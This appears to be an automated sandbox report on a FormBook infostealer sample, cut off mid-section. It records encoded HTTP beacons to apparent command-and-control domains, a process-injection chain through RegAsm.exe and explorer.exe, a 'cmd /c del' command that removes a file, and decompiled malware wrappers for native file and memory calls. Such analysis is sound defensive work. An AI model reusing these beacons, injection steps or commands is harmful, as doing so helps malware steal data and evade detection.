6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 09 09 20 20 20 20 24 28 27 23 6d 61 69 6e 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 22 2f 63 66 2e 70 68 70 22 29 3b 0a 09 09 20 20 20 20 24 28 27 23 6d 61 69 6e 27 29 2e 63 73 73 28 27 76 69 73 69 62 69 6c 69 74 79 27 2c 20 27 76 69 73 69 62 6c 65 27 29 3b 0a 09 09 7d 29 3b 0a 0a 09 09 2f 2a 20 69 66 20 28 70 61 72 65 6e 74 2e 66 72 61 6d 65 73 2e 6c 65 6e 67 74 68 20 3e 20 30 29 0a 09 09 20 20 20 20 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 29 3b 20 2a 2f 0a 09 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 66 72 61 6d 65 73 65 74 20 72 6f 77 73 3d 22 31 30 30 25 2c 2a 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 6e 6f 22 20 62 6f 72 64 65 72 3d 22 30 22 20 66 72 61 6d 65 73 70 61 63 69 6e 67 3d 22 30 22 20 69 64 3d 22 66 72 61 6d 65 73 65 74 22 3e 0a 09 3c 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 22 20 73 72 63 3d 22 2f 63 66 2e 70 68 70 22 3e 3c 2f 66 72 61 6d 65 3e 0a 09 3c 66 72 61 6d 65 20 69 64 3d 22 73 75 62 31 22 20 73 72 63 3d 22 62 68 2e 70 68 70 3f 64 6d 3d 73 61 62 61 69 63 72 61 66 74 2e 63 6f 6d 26 6b 77 3d 26 74 74 3d 33 32 31 62 32 64 37 33 65 38 39 36 35 61 37 37 30 64 64 33 31 37 37 36 62 37 32 33 62 33 31 37 26 74 79 3d 66 61 6c 73 65 22 20 73 74 79 6c 65 3d 22 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 22 3e 3c 2f 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html xmlns="http://www.w3.org/TR/REC-html40"> <head><title>sabaicraft.com</title><meta name="keywords" value=""/><meta name="description" content=""> <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script> <script type="text/javascript">$(document).ready(function () { $('#main').attr('src', "/cf.php"); $('#main').css('visibility', 'visible');});/* if (parent.frames.length > 0) top.location.replace(document.location); / </script> </head> <frameset rows="100%," frameborder="no" border="0" framespacing="0" id="frameset"><frame id="main" src="/cf.php"></frame><frame id="sub1" src="bh.php?dm=sabaicraft.com&kw=&tt=321b2d73e8965a770dd31776b723b317&ty=false" style="visibility: hidden;"></frame> </frameset></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49744	35.186.238.101	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 20, 2020 20:15:02.776315928 CET	4673	OUT	GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=6yhb1plVNlXQq+RzpSC3aP+nXZqT+h1u1iqVXpUKlvKLd7IxuSoQjy9XoIojNuJhzNIO HTTP/1.1 Host: www.deadroommn.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 20, 2020 20:15:02.891478062 CET	4674	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Fri, 20 Nov 2020 19:15:02 GMT Content-Type: text/html Content-Length: 275 ETag: "5fb6dfee-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49745	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 20, 2020 20:15:13.044230938 CET	4675	OUT	GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=r4u6PaE5VJhGb5HfNIqoFHA5GyORyqjhLy9oIJBoAQE4G0DswHvYnpLSr9alOGw3azvw HTTP/1.1 Host: www.keitakora.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 20, 2020 20:15:13.160152912 CET	4675	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Fri, 20 Nov 2020 19:15:13 GMT Content-Type: text/html Content-Length: 275 ETag: "5fb7c4ff-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: NQQWym075C.exe PID: 5264 Parent PID: 5704

General

Start time:	20:13:00
Start date:	20/11/2020
Path:	C:\Users\user\Desktop\NQQWym075C.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\NQQWym075C.exe'
Imagebase:	0xed0000
File size:	552960 bytes
MD5 hash:	BF75ED61E1B1F7B310EC1D999077C4DD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 5368 Parent PID: 5264

General

Start time:	20:13:05
Start date:	20/11/2020
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Imagebase:	0xd80000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 3388 Parent PID: 5368

General

Start time:	20:13:07
Start date:	20/11/2020
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: NQQWym075C.exe PID: 1744 Parent PID: 5264

General

Start time:	20:13:08
Start date:	20/11/2020
Path:	C:\Users\user\Desktop\NQQWym075C.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\NQQWym075C.exe'
Imagebase:	0xaf0000
File size:	552960 bytes
MD5 hash:	BF75ED61E1B1F7B310EC1D999077C4DD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 5776 Parent PID: 1744

General

Start time:	20:13:16
Start date:	20/11/2020
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Imagebase:	0xd40000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: wlanext.exe PID: 1844 Parent PID: 3388

General

Start time:	20:13:19
Start date:	20/11/2020
Path:	C:\Windows\SysWOW64\wlanext.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\wlanext.exe
Imagebase:	0xb80000
File size:	78848 bytes
MD5 hash:	CD1ED9A48316D58513D8ECB2D55B5C04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 808 Parent PID: 1844

General

Start time:	20:13:23
Start date:	20/11/2020
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5232 Parent PID: 808

General

Start time:	20:13:24
Start date:	20/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cscript.exe PID: 6064 Parent PID: 3388

General

Start time:	20:13:24
Start date:	20/11/2020
Path:	C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cscript.exe
Imagebase:	0x100000
File size:	143360 bytes
MD5 hash:	00D3041E47F99E48DD5FFFEDF60F6304
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: RegAsm.exe PID: 5368 Parent PID: 5264 RegAsm.exeCOMMON

Executed Functions

Function 00418180, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418180(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418D80(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t11 =  &_a20; // 0x413b57
				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x0041818f
0x00418197
0x004181b9
0x004181cd
0x004181d1

APIs

NtCreateFile.NTDLL(00000060,00408AC3,?,W;A,00408AC3,FFFFFFFF,?,?,FFFFFFFF,00408AC3,00413B57,?,00408AC3,00000060,00000000,00000000), ref: 004181CD

Strings

W;A, xrefs: 004181B9, 004181C4

Memory Dump Source

Source File: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID: W;A
API String ID: 823142352-2883288857
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: fc8cfab2575da1a496486cdbdd5ccf7d074368776fda38d20555821bca86f3ae
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 5CF0B2B2201208ABCB08DF89DC85EEB77ADAF8C754F158248FA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041822A, Relevance: 1.5, APIs: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0041822A(void* __ecx, signed int __edx, signed int __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t21;
				void* _t34;
				intOrPtr* _t35;
				void* _t37;

				_t33 = __edi &  *(__ecx + 0x550ccce9 + __edx * 2);
				_t16 = _a4;
				_t35 = _a4 + 0xc48;
				E00418D80(_t33, _t16, _t35,  *((intOrPtr*)(_t16 + 0x10)), 0, 0x2a);
				_t21 =  *((intOrPtr*)( *_t35))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _t34, _t37); // executed
				return _t21;
			}

0x0041822a
0x00418233
0x0041823f
0x00418247
0x00418275
0x00418279

APIs

NtReadFile.NTDLL(00413D12,5E972F59,FFFFFFFF,004139D1,?,?,00413D12,?,004139D1,FFFFFFFF,5E972F59,00413D12,?,00000000), ref: 00418275

Memory Dump Source

Source File: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 296ae86af33e55f6fdcfd20ed76a933a3c426c6cf747ab0418c17546ac81df3a
Instruction ID: 8b93fdeb18aa62919fd9b67a27f197b50e85fd5e81ea97725df436ca6712b3eb
Opcode Fuzzy Hash: 296ae86af33e55f6fdcfd20ed76a933a3c426c6cf747ab0418c17546ac81df3a
Instruction Fuzzy Hash: D5F0E7B2200108ABCB14DF89DC80EEB77A9BF8C354F158249FA1DA7251C630E8518BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00418230, Relevance: 1.5, APIs: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418230(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418D80(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}

0x00418233
0x0041823f
0x00418247
0x00418275
0x00418279

APIs

NtReadFile.NTDLL(00413D12,5E972F59,FFFFFFFF,004139D1,?,?,00413D12,?,004139D1,FFFFFFFF,5E972F59,00413D12,?,00000000), ref: 00418275

Memory Dump Source

Source File: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 34a3e3c40f91502aeb4d2aa89f59f326de5eb9f8ac5d275f0c8204906c50d898
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 32F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249FA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418360, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418360(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418D80(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x0041836f
0x00418377
0x00418399
0x0041839d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F54,?,00000000,?,00003000,00000040,00000000,00000000,00408AC3), ref: 00418399

Memory Dump Source

Source File: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: d1f298eb440679fc3bab8657f838a800a217d6648e579a06cd3cc162b437aef0
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 96F015B2200208ABCB14DF89DC81EEB77ADAF88754F158149FE0897241C630F810CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 0041835E, Relevance: 1.5, APIs: 1, Instructions: 28
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041835E(char __eax, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t15;
				void* _t22;

				asm("daa");
				 *0x8bec8b55 = __eax;
				_t11 = _a4;
				_t3 = _t11 + 0xc60; // 0xca0
				E00418D80(_t22, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t15;
			}

0x0041835e
0x0041835f
0x00418363
0x0041836f
0x00418377
0x00418399
0x0041839d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F54,?,00000000,?,00003000,00000040,00000000,00000000,00408AC3), ref: 00418399

Memory Dump Source

Source File: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 24afb6ed2fe8b94809c580a3940f555e4e22fff2aa0f2caae278aecb8b9166b4
Instruction ID: 26a4ad37998e20f872e6e0aaa2899de1750dda7a1ce20c1b9ba2ec6c5f596954
Opcode Fuzzy Hash: 24afb6ed2fe8b94809c580a3940f555e4e22fff2aa0f2caae278aecb8b9166b4
Instruction Fuzzy Hash: B0F0A0B5100188AFCB04DF98DC80CA777A8AF88210B04865EF94897202C234D814CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 004182AA, Relevance: 1.5, APIs: 1, Instructions: 21
nativeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004182AA(intOrPtr _a8, void* _a12) {
				long _t8;
				void* _t11;

				asm("a16 adc eax, 0x5547db0b");
				_t5 = _a8;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409713
				E00418D80(_t11, _a8, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a12); // executed
				return _t8;
			}

0x004182ab
0x004182b3
0x004182b6
0x004182bf
0x004182c7
0x004182d5
0x004182d9

APIs

NtClose.NTDLL(00413CF0,?,?,00413CF0,00408AC3,FFFFFFFF), ref: 004182D5

Memory Dump Source

Source File: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 2d5046458bc977f8aedde365fca88ffd8ee788c8fe4890d66a0bb913b23ef4f3
Instruction ID: f60b42a911ccf2d9c0d7d4219487f39fa3c4a92275f438de1feae2a9f4256948
Opcode Fuzzy Hash: 2d5046458bc977f8aedde365fca88ffd8ee788c8fe4890d66a0bb913b23ef4f3
Instruction Fuzzy Hash: 81E0C2312002046BD710EFD4CC89FE77B68EF44710F144459FA089B242C530EA008BD0

Uniqueness

Uniqueness Score: -1.00%

Function 004182B0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004182B0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409713
				E00418D80(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x004182b3
0x004182b6
0x004182bf
0x004182c7
0x004182d5
0x004182d9

APIs

NtClose.NTDLL(00413CF0,?,?,00413CF0,00408AC3,FFFFFFFF), ref: 004182D5

Memory Dump Source

Source File: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 6b68d8a54e684a6abef8896f3696699f2b4952745b0db19f1cfc41b8081163df
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 17D01776240318ABD710EF99DC85EE77BACEF48760F154499FA189B282C930FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 03059A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

